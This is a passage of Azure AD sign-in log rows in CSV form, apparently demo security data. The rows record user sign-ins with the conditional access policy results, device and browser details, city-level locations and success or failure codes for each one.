['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0d3dadc7-5b90-4194-87e2-04e000cb0e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0d3dadc7-5b90-4194-87e2-04e000cb0e00,SigninLogs,Sucess,33.0175209,35.44601059
+1936,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,06:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e302c415-86af-40d1-96d8-2da3b94dfa57,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:06,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",134c741e-1983-4152-9e8f-7188dc081000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,134c741e-1983-4152-9e8f-7188dc081000,SigninLogs,Sucess,33.7984581,-84.38828278
+1937,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1c853f11-fbd3-4f1b-9b35-dfc12469da90,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",1fc6d415-116e-44c9-a4fc-b8eff70e1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1fc6d415-116e-44c9-a4fc-b8eff70e1000,SigninLogs,Sucess,36.6404686,-78.26995087
+1938,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:40.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5374abba-89aa-4501-9fe6-5fbdfae62cee,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",34a4214f-a676-41f3-9bb4-26fa419d0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,34a4214f-a676-41f3-9bb4-26fa419d0f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1939,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:15.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ad42fed0-9dca-48c6-b95e-5db3925ca1b0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",fd7a6355-56f5-4bc2-9ad4-c25971700f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,fd7a6355-56f5-4bc2-9ad4-c25971700f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1940,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:36.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,38e617cc-a4b6-4ecc-9b76-c9adca6148e7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",13ab9514-e229-4755-99bf-dc8889c31000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,13ab9514-e229-4755-99bf-dc8889c31000,SigninLogs,Failed,33.7984581,-84.38828278
+1941,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:48.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,87148da1-d94c-4cfd-b681-692dc80a64ce,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1dbd81fd-18f7-4582-ba72-d8f25c841300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,1dbd81fd-18f7-4582-ba72-d8f25c841300,SigninLogs,Sucess,50.6406517,5.572050095
+1942,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:12.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,97c764c6-f55c-4d7c-bf25-e5947a527f36,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,CRM Power BI Integration,e64aa8bc-8eb4-40e2-898b-cf261a25954f,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:14,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",a90d7024-2f24-4b85-b726-7a3017c91100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Common Data Service,a90d7024-2f24-4b85-b726-7a3017c91100,SigninLogs,Sucess,50.6406517,5.572050095
+1943,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:50.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,80c7469f-80aa-0000-5d33-f615727add92,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 